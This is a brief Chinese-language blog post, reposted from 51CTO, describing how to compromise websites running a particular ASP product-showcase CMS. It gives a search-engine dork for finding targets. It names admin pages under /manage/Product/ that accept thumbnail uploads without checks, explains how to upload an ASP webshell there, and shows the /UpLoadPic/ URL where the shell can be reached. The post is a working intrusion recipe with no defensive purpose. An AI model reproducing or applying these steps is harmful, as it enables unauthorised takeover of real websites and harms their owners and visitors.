原漏洞：

搜索 inurl:cpzs.asp?ProClass=

根目录下   /manage/Product/add_news.asp

缩略图上传asp马

提交后,选择EDIT 找到那个asp的名称 
构造
http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp

最新的漏洞：

搜索 inurl:cpzs.asp?ProClass=

根目录下   manage/Product/add_newsclass.asp

直接缩略图上传asp的马

提交后   

去选那个EDIT 找到那个你上穿的asp马
构造     
http://网址 /UpLoadPic/ProClass_Pic/上传获得的地址.asp

本文转自 小王 51CTO博客，原文链接：http://blog.51cto.com/xiaowang/300745，如需转载请自行联系原作者